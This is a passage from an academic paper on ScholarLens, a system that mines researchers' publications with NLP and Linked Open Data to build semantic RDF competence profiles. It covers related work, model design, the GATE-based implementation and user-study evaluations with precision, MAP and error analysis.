profiling task on the UvT collection varies between 0.20 and 0.30. In the UvT collection, the ground truth was explicitly given by the users, as they provide a description of their research areas together with keywords from a topic hierarchy. Another notable example for an expertise retrieval system is AMiner (https://aminer.org) (Tang et al., 2010), a system that combines user profiling and document retrieval techniques. General user information, such as affiliation and position, as well as research interests and research networks are presented in textual and visual form. The profiling approach consists of three main steps: profile extraction, author name disambiguation and user interest discovery. Profile extraction points to collecting general user information from web pages. Given a scholar’s name, a binary classifier selects web pages according to features, like a person’s name appearing in a page title. All retrieved pages are tagged with categories that are used to generate profile properties, including affiliation, email, address and phone numbers. Extracting research interests are left out in this step, since not all scholars enumerate their interests on their web pages. In addition, research interests should be proved by textual evidence. In a second step, AMiner attempts to link documents with the basic user profiles, in order to obtain a list of a scholar’s publications. In this step, AMiner uses publications from different online digital libraries, e.g., DBLP or ACM. To solve the name disambiguation problem (i.e., two scholars with the same name), they Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 10/39 https://peerj.com http://research.microsoft.com/en-us/um/people/nickcr/w3c-summary.html http://research.microsoft.com/en-us/um/people/nickcr/w3c-summary.html http://es.csiro.au/cerc/ http://ilps.science.uva.nl/resources/tu-expert-collection/ https://aminer.org http://dx.doi.org/10.7717/peerj-cs.121 developed a probabilistic model based on author names. In the final step, they determine user interests from the generated linked list of papers. Interests are described based on the detected topics. A topic consists of a mixture of words and probabilities being associated with that word. They propose a probabilistic model called Author-Conference-Topic (ACT) model, where ‘conference’ comprises all kinds of publications, namely journals, conferences and articles. The idea behind this approach is that an author writing a paper uses different words based on her research interests, which denote the topic distribution. The discovered topic distributions are used as research interests and are stored together with the general information in an extended FOAF format, in what they call a researcher network knowledge base (RNKB). For the evaluation, they utilized pooled relevance judgments (Buckley & Voorhees, 2004) and human judgments. Seven people rated the retrieved expert lists for 44 topic queries along four expertise levels: definite expertise, expertise, marginal expertise and no expertise. The judges were taught to do the rating according to a guideline following certain criteria, such as how many publication the retrieved scholar actually has for the given topic or how many awards she has received or conferences attended. In a final step, the judgment scores were averaged. In their experiments, they tested different language models along with their ACT model, which was shown to outperform the other models in the best run (P@5: 65.7%, P@10: 45.7%, MAP: 71%). Expert profiling using text mining Generating scholarly profiles has not only been investigated in Information Retrieval, but also in the computational linguistics domain. A first expert profiling approach using Linked Open Data is suggested by Buitelaar & Eigner (2008). They define simple linguistic patterns to identify competences in a user’s research publications. Bordea & Buitelaar (2010b) further developed that idea using a GATE pipeline (Bordea & Buitelaar, 2010a) that finds pre-defined skill types in research papers. They define skill types as general domain words that represent theoretical and practical expertise, such as method, algorithm or analysis. Additionally, they applied an adapted TD-IDF filtering algorithm and removed terms from the final list that were considered too broad. In Bordea et al. (2012), they extended their system with semantic linking to DBpedia ontology concepts (http://wiki.dbpedia.org/services-resources/ontology) and attempt to find a corresponding concept in the Linked Open Data cloud for each extracted topic. For the evaluation, they conducted a user study with three domain experts, using their own corpus. The users were asked to judge a limited list of 100 ranked topics for a given domain. The list was divided into three sections, top, middle and bottom, and the judges classified the provided topics into good, bad or undecided. Finally, the Kappa statistic was applied to aggregate the three judgments. Overall, 80% of the top ranked topics were marked as good. According to recent findings Letierce et al. (2010), social media platforms are widely used among scientists to share research news. Nishioka & Scherp (2016) generated scholarly profiles out of social media items, namely Twitter (http://www.twitter.com), for recommending scientific publications. They examine different factors influencing the recommendation process, such as profiling method, temporal decay (sliding window and exponential decay) and richness of content (full-text and title versus title only). Regarding Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 11/39 https://peerj.com http://wiki.dbpedia.org/services-resources/ontology http://www.twitter.com http://dx.doi.org/10.7717/peerj-cs.121 the profiling method, they took into account the following filtering methods: CF-IDF, an adapted TF-IDF algorithm using concepts of ontologies instead of full-text terms, HCF-IDF, their own extended hierarchical approach and Latent Dirichlet Allocation (LDA) (Blei, Ng & Jordan, 2003) topic modeling. For both user tweets and publications, they extract concepts with corresponding labels in the underlying knowledge base through gazetteers. By means of the Stanford Core NLP (http://stanfordnlp.github.io/CoreNLP/) tools, they remove stop words and Twitter hashtags. In their evaluation with 123 participants and around 280,000 scientific publications from economics, they analyzed in total 12 different recommendation strategies, derived as combinations from the three influencing factors and their sub-factors. The participants obtained the top-5 recommendations for each of the 12 strategies and rated the presented publication list on a binary scale. Their results reveal that the most effective strategy was the one with the CF-IDF filtering, the sliding window, and with full-texts and titles. Additionally, it turned out that using titles only in combination with the HCF-IDF filtering produces similarly good recommendations. Implicit profiling in social media In the last decade, using social media platforms for implicit user profile generation attracted increasing attention (Szomszor et al., 2008; Abel et al., 2011; Stankovic, Rowe & Laublet, 2012). Through a number of different NLP methods, ‘interesting’ topics are extracted from short messages or social network posts. LinkedVis (Bostandjiev, O’Donovan & Höllerer, 2013) for instance is an interactive recommender system that generates career recommendations and supports users in finding potentially interesting companies and specific roles. LinkedVis developers designed four different user models based on data from LinkedIn (https://www.linkedin.com) and extract interests and preferences from a user’s connections, roles and companies. Two of the four constructed profiles contained meaningful entities instead of plain keywords. A Part-of-Speech tagger was utilized to find noun phrases that were mapped to Wikipedia articles. The evaluation with a leave-one-out cross-validation revealed that the user models with semantic enrichment produced more accurate and diverse recommendations than the profiles based on TF-IDF weights and occurrence matching. Another approach using NLP methods for online profile resolution is proposed by Cortis et al. (2013): they developed a system for analyzing user profiles from heterogenous online resources in order to aggregate them into one unique profile. For this task, they used GATE’s ANNIE (https://gate.ac.uk/sale/tao/splitch6.html) plugin (Cunningham et al., 2011) and adapted its JAPE grammar rules to disassemble a person’s name into five sub-entities, namely, prefix, suffix, first name, middle name and surname. In addition, a Large Knowledge Base (LKB) Gazetteer was incorporated to extract supplementary city and country values from DBpedia (http://dbpedia.org). In their approach, location-related attributes (e.g., ‘Dublin’ and ‘Ireland’) could be linked to each other based on these semantic extensions, where a string-matching approach would have failed. In their user evaluation, the participants were asked to assess their merged profile on a binary rating scale. More than 80% of the produced profile entries were marked as correct. The results Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 12/39 https://peerj.com http://stanfordnlp.github.io/CoreNLP/ https://www.linkedin.com https://gate.ac.uk/sale/tao/splitch6.html http://dbpedia.org http://dx.doi.org/10.7717/peerj-cs.121 reveal that profile matchers can improve the management of one’s personal information across different social networks and support recommendations of possibly interesting new contacts based on similar preferences. Discussion As presented above, automatic user profiling approaches using linked named entities and NLP techniques are becoming increasingly popular. Sources for generating profiles vary from scientific papers to social media items, profiles in social networks or an aggregation of different sources. In particular, expert profiling has evolved into its own research area. However, the most widespread description of a user model in these applications is still a term-based vector representation. Even though keywords are increasingly replaced by linked entities, they still lack an underlying semantic model in RDF or OWL format. In contrast, we aim at automatically creating semantic user profiles for scholars by means of NLP methods and semantic web technologies. Our goal is to establish user profiles in an interoperable RDF format that can be stored in a triplestore. Hosting user information in such a structured and meaningful semantic format facilitates data integration across different sources. Furthermore, expressive SPARQL queries and inferences can help to discover related preferences that are not explicitly stated in the profiles. The open, shared knowledge base constructed by our approach can then be accessed by a multitude of different scholarly applications. DESIGN Modeling semantic scholarly profiles requires a formalization of the relations between authors and their competences in a semantically rich format. The three central concepts in our model are researchers, their competence topics and a set of scholarly documents. We hypothesize that authors of a scholarly publication (e.g., a journal article) are competent in topics mentioned in the article to various degrees. This way, for each author (i.e., researcher with at least one publication) we create a semantic user profile. With the ultimate goal of creating machine-readable, inter-operable profiles, we decided to use the W3C standard Resource Description Framework (RDF) to design profiles based on semantic triples. Semantic modeling of user competence records Every entity in our model is defined as a semantic triple 〈s,p,o〉, where s is a unique resource identifier (URI) within the knowledge base, p is a property from a set of pre-defined relations between authors and their profile elements, and o is either a unique identifier of an entity (in the knowledge base or an external dataset), or a literal value. All users in our model are instances of the User Model Ontology (UM) (http: //intelleo.eu/ontologies/user-model/spec/) User class, designed specifically for modeling users in collaborative contexts. As a subclass of the FOAF Person class, all user instances inherit attributes and relations from the FOAF vocabulary. Since our primary source of competence detection are the users’ publications, we also need to semantically model the documents and their content. For a user u, we denote Du ={d1,d2,...,dn} as a set of documents published by the user. Each document d contains a set of topics Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 13/39 https://peerj.com http://intelleo.eu/ontologies/user-model/spec/ http://intelleo.eu/ontologies/user-model/spec/ http://dx.doi.org/10.7717/peerj-cs.121 Td ={t1,t2,...,tn}, where each ti is essentially a named entity (NE), like ‘text mining’ or ‘automatic reasoning’ within the document’s sentences. Topics are often repeated many times in a document. Thus, we need to be able to annotate where a topic is mentioned in a document. Every topic t will then have two attributes: a start and end offset, containing the index of their first and last character in the document. This way, every mention of a competence topic found in a document is modeled as a semantic triple and we can count the frequency of the competence topics mentioned in each document, as well as overall for each user profile. The challenge here is to identify various orthographic forms of the same topic in a document, so that we can determine the unique topics in T . For instance, topic ‘Linked Open Data’ may be mentioned in the abstract of a document and then later on ‘LOD’ may appear in the background section. This results in two triples, each describing the two competence topics with different forms in text, although, in fact they represent the same concept. As a solution, each mention of topic t will be the subject of an additional triple 〈t,rdfs : isDefinedBy,l〉, where l is the URI of a resource, where the topic (concept) is defined in a given knowledge base or dataset. Unique topics with different surface forms in the document can now be identified through their resource URI. In our model, users and their competence topics are inter-connected through competence records. A competence record contains the provenance metadata of a user’s competences (e.g., the document identifier in which it was found) and can be additionally associated with a level of expertise. Finally, we define a user profile as a labeled, directed graph Pu =(V ,E), where V={D∪T} and E is a set of edges between a user’s publications and their encompassed topics, as well as outgoing links from the T elements to LOD resources. Since RDF documents intrinsically represent labeled, directed graphs, the semantic profiles of scholars extracted from the documents can be merged through common competence URIs—in other words, authors extracted from otherwise disparate documents can be semantically related using their competence topics. Following the best practices of producing linked open datasets, we tried to reuse existing Linked Open Vocabularies (LOVs) to the extent possible for modeling the semantic user profiles. Table 2 shows the vocabularies used to model our semantic scholar profiles and their respective selected terms. We largely reuse IntelLEO (http://www.intelleo.eu/) ontologies for competence modeling—originally designed for semantic modeling of learning contexts—, in particular the vocabularies for User and Team Modeling (http://intelleo.eu/ontologies/user-model/spec) and Competence Management (http://www.intelleo.eu/ontologies/competences/spec). We also reuse the PUBO ontology (Sateli & Witte, 2015) for modeling the relations between the documents that we process, the generated annotations and their inter-relationships. Figure 2 shows a minimal example semantic profile in form of an RDF graph. Automatic detection of competences In this section, we describe our automatic workflow for constructing semantic scholarly profiles. We first iterate the requirements of such a workflow and then present various components of our ScholarLens approach that satisfy these requirements. An overview of our system architecture is illustrated in Fig. 3. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 14/39 https://peerj.com http://www.intelleo.eu/ http://intelleo.eu/ontologies/user-model/spec http://www.intelleo.eu/ontologies/competences/spec http://dx.doi.org/10.7717/peerj-cs.121 "Here we present a first prototype..." "prototype" ex:Author#1 um:User rdf:type ex:Bahar rdfs:isDefinedBy ex:CompetenceRecord#5 um:hasCompetencyRecord ex:Competence#4 c:competenceFor c:CompetenceRecord rdf:type cnt:chars c:Competence rdf:type dbpedia:Software_prototyping rdfs:isDefinedBy ex:Doc#9 pubo:hasAnnotation pubo:hasAnnotation ex:RE#6 pubo:hasAnnotation cnt:chars pubo:containsNE sro:Contribution rdf:type Figure 2 The RDF graph shown in this picture represents a semantic user profile that illustrates the relations between an author and the topics mentioned in her article. Table 2 Modeling user profiles with linked open vocabularies (LOVs): this table shows the terms se- lected from various vocabularies and their corresponding concept in the semantic user profiles. The vo- cabulary namespaces used in the table can be de-referenced using the URLs shown at the bottom. LOV Term Modeled concept um: user Scholarly users, who are the documents’ authors. um:hasCompetencyRecord A property to keep track of a user’s competence (level, source, etc.). c: competency Extracted topics (LOD resources) from documents. c:competenceFor A relation between a competence record and the competence topic. sro: rhetoricalElement A sentence containing a rhetorical entity, e.g., a contribution. cnt:chars A competence’s label (surface form) as it appeared in a document. pubo:hasAnnotation A property to relate annotations to documents. pubo:containsNE A property to relate rhetorical zones and entities in a document. oa:start & oa:end A property to show the start/end offsets of competences in a text. Notes. um, http://intelleo.eu/ontologies/user-model/ns/; c, http://intelleo.eu/ontologies/competences/ns/; sro, http: //salt.semanticauthoring.org/ontologies/sro#; cnt, http://www.w3.org/2011/content#; pubo, http://lod.semanticsoftware. info/pubo/pubo#; oa, http://www.w3.org/ns/oa/; rdf, http://www.w3.org/1999/02/22-rdf-syntax-ns#; rdfs, http://www.w3.org/2000/01/rdf-schema#. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 15/39 https://peerj.com http://intelleo.eu/ontologies/user-model/ns/ http://intelleo.eu/ontologies/competences/ns/ http://salt.semanticauthoring.org/ontologies/sro# http://salt.semanticauthoring.org/ontologies/sro# http://www.w3.org/2011/content# http://lod.semanticsoftware.info/pubo/pubo# http://lod.semanticsoftware.info/pubo/pubo# http://www.w3.org/ns/oa/ http://www.w3.org/1999/02/22-rdf-syntax-ns# http://www.w3.org/2000/01/rdf-schema# http://dx.doi.org/10.7717/peerj-cs.121 . . . . . . . . . . . . . . Annotated Text Semantic Triples Pre−processed Text Gazetteer Rule Transducers Named Entity Linking S e m a n ti c A n a ly s isEnglish Tokenizer Sentence Splitter Part−Of−Speech Tagger Noun Phrase Chunker Lemmatizer S y n ta c ti c a l P ro c e s s in g Natural Language Processing Pipeline Linked Open Data E x p o rt Annotation to Triple Converter Knowledge BaseScientific Literature Figure 3 The workflow shown here depicts how scientific literature undergoes various syntactical and semantic processing steps. The output of the workflow is a knowledge base populated with semantic user profiles, inter-linked with resources on the linked open data cloud. Requirements Our goal is to automatically populate semantic user profiles by mining the users’ publications for competence topics. Therefore, we identify the following requirements for our workflow: Requirement 1: access to scholarly articles’ full-text. The workflow should be able to accept a set of documents written by an author as input, which may be in various publisher- dependent, formatting styles. The documents must be machine-readable, that is, the workflow must be have access to the textual content of the entire article. Requirement 2: automatic extraction of domain topics. In order to extract the competence topics, we need to annotate the Named Entities (NEs) in a document that represent relevant concepts for a domain. For example, words like ‘benchmarking’ and ‘Linear Regression’ represent relevant research activities and concepts in a computer science article. Requirement 3: semantic representation of extracted information. The extracted infor- mation from documents must be stored in a machine-readable and inter-operable format, in order to facilitate the implementation of value-added services, like expertise recommendation. The users, their publications and the competence topics must be uniquely identifiable in the output. All instances and their attributes must be represented using semantic web vocabularies. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 16/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Text mining documents for competence topics We leverage various text mining techniques in our semantic profiling workflow. If the input document is in any format other than plain-text, it first goes through a text extraction phase. In this step, any publisher-specific formatting is eliminated from the document. The plain-text document is then prepared for further analysis in a so-called pre-processing phase. This step is language-dependant, but can be reused for documents in various domains. The first step is to break down a document’s text into tokens—smaller, linguistically meaningful segments, like words, numbers and symbols. Tokens are then grouped into sentences and each word token is tagged with a part-of-speech tag, e.g., ‘noun’ or ‘verb’. To eliminate the different orthographical forms of tokens in a text, we lemmatize the document’s text, so that all inflected forms of nouns (singular vs. plural) and verbs (various tenses) are changed to their canonical form (Requirement 1). The pre-processed text is subsequently passed onto the semantic processing phase for user competence detection. Grounding competence topics to LOD resources Since it is not feasible to manually construct and maintain a knowledge base of all possible topics appearing in documents, we leverage the Linked Open Data (LOD) cloud as a source of continually-updated knowledge. The idea is to link the competence topics to their corresponding resources on the LOD cloud, where machine-readable, semantic metadata about each topic can be found by de-referencing the link’s address. To this end, we use a linked data-enabled Named Entity Recognition (NER) tool that can detect named entities in the documents, resolve them to their correct sense and link the surface forms to existing resources in LOD datasets (Requirement 2). Grammatical processing performed in the previous step helps us to filter out tokens that do not typically represent competences, like adverbs or pronouns. We exclude processing the sentences in figure and table captions, formulas, section headers and references, as we empirically verified that these document regions rarely contain authors competence topics. Knowledge base population As we mentioned earlier, the output of our system is a knowledge base populated with semantic user profiles (Requirement 3). We leverage the Resource Description Framework (RDF) syntax to describe the extracted information in a semantically meaningful way, using the model described in ‘Semantic modeling of user competence records’. In the populated user profiles, we use the raw frequency of the detected topics (named entities) in documents as a means of ranking the top competence topics for each scholar. We store the profile RDF documents in a triplestore that can later on be queried for various applications. An important design decision in modeling the knowledge base is deciding whether all (potentially hundreds) of topics in a document are indeed representative of its authors’ competences. Or perhaps, a subset of the topics located in the rhetorical zones of an article are better candidates? Previously in Sateli & Witte (2015), we investigated the detection of Rhetorical Entities (REs) as sentences in a scholarly document that convey its authors findings or argumentations, like their Claims or Contributions. We also showed how the named entities within the boundaries of these REs can represent a document’s content Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 17/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Figure 4 This figure shows a sequence of processing resources aggregated into a GATE pipeline for the automatic generation of user profiles based on competences extracted from publications. in various use cases, such as retrieving semantically related articles. Additionally, we determined that storing the named entities within REs requires an order of a magnitude fewer triples, compared to exporting the topics of the entire document. To test whether the same assumption can be made about the authors’ competence topics, we additionally export all rhetorical entities in a document and add an additional property to each topic (NE) that is mentioned within an RE. We will revisit our hypothesis in ‘Extended experiments’. IMPLEMENTATION In this section, we describe how we realized the semantic user profiling of authors illustrated in the previous section. Extraction of user competences with text mining We developed a text mining pipeline (Fig. 4), implemented based on the GATE framework (Cunningham et al., 2011), to analyze a given author’s papers in order to automatically extract the competence records and topics. The NLP pipeline accepts a corpus (set of documents) for each author as input. We use GATE’s ANNIE plugin to pre-process each document’s full-text and further process all sentences with the Hepple part-of- speech (POS) tagger, so that their constituents are labeled with a POS tag, such as noun, verb, or adjective and lemmatized to their canonical (root) form. We then use MuNPEx Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 18/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Figure 5 Example annotated document for a contribution (RhetoricalEntity) and the competence top- ics (DBpediaNEs) within its boundaries in GATE graphical user interface. (http://www.semanticsoftware.info/munpex), a GATE plugin to detect noun phrases in text, which helps us to extract competence topics that are noun phrases rather than nouns alone. Subsequently, we use our LODtagger (http://www.semanticsoftware.info/lodtagger), which is a GATE plugin that acts as a wrapper for the annotation of documents with Named Entity Recognition tools. In our experiments, we use a local installation of DBpedia Spotlight (Mendes et al., 2011) v7.0 with the statistical model version 20160113 (http://spotlight.sztaki.hu/downloads/) for English (en_2+2) (Daiber et al., 2013). Spotlight matches the surface form of the document’s tokens against the DBpedia ontology and links them to their corresponding resource URI. LODtagger then transforms the Spotlight response to GATE annotations using the entities’ offsets in text and keeps their URI in the annotation’s features (Fig. 5). To evaluate whether our hypothesis that the NEs within rhetorical zones of a document are more representative of the author’s competences than the NEs that appear anywhere in a document, we decided to annotate the Claim and Contribution sentences of the documents using our Rhetector (http://www.semanticsoftware.info/rhetector) GATE plugin (Sateli & Witte, 2015). This way, we can create user profiles exclusively from the competence topics that appear within these RE annotations for comparison against profiles populated from full-text. Rhetector was evaluated in Sateli & Witte (2015) with an average F-measure of 73%. Finally, we create a competence record between the author and each of the detected competences (represented as DBpedia NEs). We use GATE’s JAPE language that allows us to execute regular expressions over documents’ annotations by internally transforming them into finite-state machines. Thereby, we create a competence record (essentially, Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 19/39 https://peerj.com http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/lodtagger http://spotlight.sztaki.hu/downloads/ http://www.semanticsoftware.info/rhetector http://dx.doi.org/10.7717/peerj-cs.121 a GATE relation) between the author annotation and every competence topic in the document. Figure 5 shows example semantic annotations generated by our text mining pipeline in the GATE Developer environment. Automatic population of semantic user profiles The last step in our automatic generation of semantic user profiles is to export all of the GATE annotations and relations from the syntactic and semantic processing phases into semantic triples, represented with RDF. Our LODeXporter (http://www.semanticsoftware. info/lodexporter) tool provides a flexible mapping of GATE annotations to RDF triples with user-defined transformation rules. For example, the rules: map:GATECompetence map:GATEtype "DBpediaNE" . map:GATECompetence map:hasMapping map:GATELODRefFeatureMapping . map:GATELODRefFeatureMapping map:GATEfeature "URI" . map:GATELODRefFeatureMapping map:type rdfs:isDefinedBy . describe that all ‘DBpediaNE’ annotations in the document should be exported, and for each annotation the value of its ‘URI’ feature can be used as the object of the triple, using ‘rdfs:isDefinedBy’ as the predicate. Similarly, we use the LOV terms shown in Table 2 to model authors, competence records and topics as semantic triples and store the results in an Apache TDB-based (http://jena.apache.org/documentation/tdb/) triplestore. EVALUATION We performed two rounds of evaluations: In a first user study, described in detail in Sateli et al. (2016) and summarized below, we tested an initial version of our profiling approach. To investigate the reasons for generated ‘irrelevant’ profile entries, we went back to a number of users from our study and performed a post-mortem error analysis. Our finding are presented in ‘User study: error analysis’. Based on the detected issues, we refined both our profile generation pipeline and the survey methodology for a second user study. Our new setup and the results are described in ‘Extended Experiments’. Methodology and Metrics We evaluate the quality of the generated user profiles through user studies. For each participant, we processed a number of the user’s publications and created competence entries in a knowledge base. We then went back to the users and showed them the top-50 (by competence frequency) generated profile entries in a human-readable format, in order to evaluate whether we found a pertinent competence. To evaluate the effectiveness of our system, we utilize common retrieval evaluation methods, namely Precision@k, Mean Average Precision (MAP) (Manning, Raghavan & Schütze, 2008) and normalized Discounted Cumulative Gain (nDCG) (Järvelin & Kekäläinen, 2002). We first analyze the top ranked competence results of an individual user, specifically, the top-10, top-25 and top-50, and measure the precision at rank (Precision@k) Eq. (1), Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 20/39 https://peerj.com http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://jena.apache.org/documentation/tdb/ http://dx.doi.org/10.7717/peerj-cs.121 which is defined as: Precision@k= 1 k · k∑ c=1 rel(c), (1) where k denotes the rank of the competence that is considered and rel(c) marks the rating for the iterating position c, which is either 0 for irrelevant or 1 for relevant topics. While the Precision@k is focused on the result for a certain rank of an individual user, the MAP is a metric that expresses the mean average of competence rankings over all users in one value. MAP Eq. (3) indicates how precise an algorithm or system ranks its top-k results, assuming that the entries listed on top are more relevant for the information seeker than the lower ranked results. Precision is then evaluated at a given cut-off rank k, considering only the top-k results returned by the system. Hence, MAP is the mean of the average precisions at each cut-off rank and represents a measure for computing the quality of a system across several information needs; in our case, users with competences. For all relevant competences c ∈C per user u, we compute the Average Precision (AP) of a user u as follows Eq. (2): AP(u)= 1 Cr,k k∑ c=1 Precision@k·rel(c), (2) where rel(c) is 1 if the competence c is relevant and 0 for the opposite case. Cr,k is the set of all relevant competences up to a certain cut-off rank k. Finally, for every user u∈U , the MAP is then defined as follows Eq. (3): MAP(U)= 1 |U| |U|∑ u=1 AP(u). (3) In contrast to the MAP, which only considers binary ratings, the DCG Eq. (4) computes the ranking based on Likert scales (Likert, 1932). Given a list of competences, relc is the actual rating of each single competence c. For example, in our second user study we assign the competence types 0 (irrelevant), 1 (general), 2 (technical) and 3 (research), as defined below. Similar to the precision, the DCG assumes that higher ranked items are more relevant for the users than lower ranked. In order to take this into account, a logarithmic decay function is applied to the competences, known as the gains. For a set of users U , let rel(c) be the relevance score given to competence c ∈C for user u∈U . Then, the DCG for every user as defined in Croft, Metzler & Strohman (2009) is the sum over all |C| competence gains Eq. (4): DCGu=rel1+ |C|∑ c=2 relc log2c . (4) Due to the variable length of the result lists, the DCG values should be normalized across all users. Therefore, the competences are sorted according to their relevance. This ordered list is called Ideal DCG (IDCG). Finally, this IDCG is used to compute the normalized DCG (nDCG) for a user u as follows Eq. (5): nDCGu= DCGu IDCGu . (5) Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 21/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Initial experiments In our first evaluation round (Sateli et al., 2016), we reached out to ten computer scientists from Concordia University, Canada and the University of Jena, Germany (this study also included the authors of the paper) and asked them to provide us with a number of their selected publications. We processed the documents and populated a knowledge base with the researchers’ profiles. Using a Java command-line tool that queries this knowledge base, we generated documents as a human-readable format of the researchers’ profiles, each listing the top-50 competence topics, sorted by their occurrence in the users’ publications. Subsequently, we asked the researchers to review their profiles across two dimensions: (i) relevance of the extracted competences and (ii) their level of expertise for each extracted competence. For each participant, we exported two versions of their profile: (i) a version with a list of competences extracted from their papers’ full-text, and (ii) a second version that only lists the competences extracted from the rhetorical zones of the documents, in order to test our hypothesis described in ‘Knowledge base population’. To ensure that none of the competence topics are ambiguous to the participants, our command-line tool also retrieves the English label and comment of each topic from the DBpedia ontology using its public SPARQL endpoint (http://dbpedia.org/sparql). The participants were instructed to choose only one level of expertise among (‘‘Novice’’, ‘‘Intermediate’’, ‘‘Advanced’’) for each competence and select ‘‘Irrelevant’’ if the competence topic was incorrect or grounded to a wrong sense. Table 3 shows the evaluation results of our first user study. In this study, a competence was considered as relevant when it had been assigned to one of the three levels of expertise. For each participant, we measured the average precision of the generated profiles in both the full-text and RE-only versions. The results show that for both the top-10 and top-25 competences, 70–80% of the profiles generated from RE-only zones had a higher precision, increasing the system MAP up to 4% in each cut-off. In the top-50 column, we observed a slight decline in some of the profiles’ average precision, which we believe to be a consequence of more irrelevant topics appearing in the profiles, although the MAP score stays almost the same for both versions. User study: error analysis In order to refine our approach, we went back to the users from the first study to understand the root cause of competences they marked as irrelevant. We asked a number of users to classify each irrelevant competence into one of four error categories: Type 1 (Wrong URI). The profile contains a wrong URI: this is typically caused by the linking tool assigning the wrong URI to a surface form; either because it picked the wrong sense among a number of alternatives or the correct sense does not exist in the knowledge base. Type 2 (Empty description). As explained above, we retrieve the comment for each competence URI to make sure users understand their profile entries. In about 3% of profile entries, this automatic process failed, leading to an empty description, which was often marked as irrelevant. We identified three main causes for this: (a) a timeout in the SPARQL query to the public DBpedia endpoint; (b) missing comment entry in Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 22/39 https://peerj.com http://dbpedia.org/sparql http://dx.doi.org/10.7717/peerj-cs.121 Table 3 Evaluation results for the generated user profiles in the first user study: this table shows the number of distinct competence topics ex- tracted from the ten participants and the average precisions at 10, 25 and 50 cut-off ranks. The last row (MAP) shows the mean average precision of the system at various cut-offs. Participant #Docs #Distinct competences Avg. precision@10 Avg. precision@25 Avg. precision@50 Full-text REs only Full-text REs only Full-text REs only Full-text REs only R1 8 2,718 293 0.91 0.80 0.84 0.74 0.80 0.69 R2 7 2,096 386 0.95 0.91 0.90 0.92 0.87 0.91 R3 6 1,200 76 0.96 0.99 0.93 0.95 0.92 0.88 R4 5 1,240 149 0.92 0.92 0.86 0.81 0.77 0.75 R5 4 1,510 152 0.84 0.99 0.87 0.90 0.82 0.82 R6 6 1,638 166 0.93 1.0 0.90 0.97 0.88 0.89 R7 3 1,006 66 0.70 0.96 0.74 0.89 0.79 0.86 R8 8 2,751 457 0.96 1.0 0.92 1.0 0.92 0.99 R9 9 2,391 227 0.67 0.73 0.62 0.70 0.56 0.65 R10 5 1,908 176 0.96 0.91 0.79 0.80 0.69 0.70 MAP 0.88 0.92 0.83 0.87 0.80 0.81 English for some resources in the online DBpedia; and the much rarer cause (c) where the URI generated by the linking tool was valid for an older version of DBpedia, but has meanwhile been removed. Type 3 (User misunderstanding). Some users interpreted the task differently when it came to identifying their competences: rather than evaluating what they are generally competent in, they marked each entry that did not fall into their research fields as irrelevant. For example, a researcher working on web services marked ‘HTTP (Protocol)’ as irrelevant, since HTTP was not a research topic in itself, though the user clearly had knowledge about it. Type 4: (Unspecific competence). Users often assigned irrelevant for competences that were deemed too broad or unspecific. The cause is very similar to Type 3, with the main difference that competences here were high-level concepts, like System, Idea, or Methodology, whereas Type 3 errors were assigned to technical terms, like HTTP, Data Set, or User (computing). The results of this analysis are summarized in Table 4. As can be seen, the majority of the errors (77% and 82%) are of Type 1. This is consistent with earlier observations we had about DBpedia Spotlight when applying it to research literature (Sateli & Witte, 2015). Modifying or retraining Spotlight itself was out of the scope of this work, but we addressed some common errors in our pipeline, as described below. Extended experiments With the lessons learned from our first experiment, we enhanced our competence topic detection pipeline to remove the error types iterated in the previous section. In particular, to address Type 1 error, we excluded exporting entities with surface forms like ‘‘figure’’ or ‘‘table’’ from newly generated profiles, as these were consistently linked to irrelevant topics like ‘‘figure painting’’ or ‘‘ficus’’. To address Type 3 and Type 4 errors, we refined the Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 23/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Table 4 Error analysis of the irrelevant competence entries generated for the participants in the first user study: for each error type, the total numbers of irrelevant competences in the profile and its percentage (rounded) is shown. Error type User Average R8 R1 R6 R9 R3 R4 R2 ; 4 7 10 7 6 16 7 8.14 ; Type 1 100% 64% 91% 30% 100% 89% 100% 82% ; 0 2 0 1 0 0 0 0.43 ; Type 2 0% 18% 0% 4% 0% 0% 0% 3% ; 0 0 0 8 0 0 0 1.14 ; Type 3 0% 0% 0% 35% 0% 0% 0% 5% ; 0 2 1 7 0 2 0 1.71 ; Fu ll -t ex tp ro fi le s Type 4 0% 18% 9% 30% 0% 11% 0% 10% ; 1 13 10 13 14 14 5 10 ; Type 1 50% 65% 100% 45% 93% 88% 100% 77% ; 0 1 0 2 0 0 0 0.43 ; Type 2 0% 5% 0% 7% 0% 0% 0% 2% ; 0 3 0 11 1 1 0 2.29 ; Type 3 0% 15% 0% 38% 7% 6% 0% 9% ; 1 3 0 3 0 1 0 1.14 ; R E pr of il es Type 4 50% 15% 0% 10% 0% 6% 0% 12% task description shown to participants before they start their evaluation. Additionally, we introduced a competence classification to distinguish general competences from technical and research competences. However, to accommodate this classification we dropped the previous assessment of competence levels, as we did not want to double the workload of our study participants. Automatic generation of online surveys For our revised experiment, we set up a web-based user profile evaluation system. In the new set up, instead of generating profiles for users, we implemented a survey-style profile generation tool that queries the populated knowledge base and generates web- based profiles compatible with LimeSurvey (https://www.limesurvey.org), an open source survey application with built-in 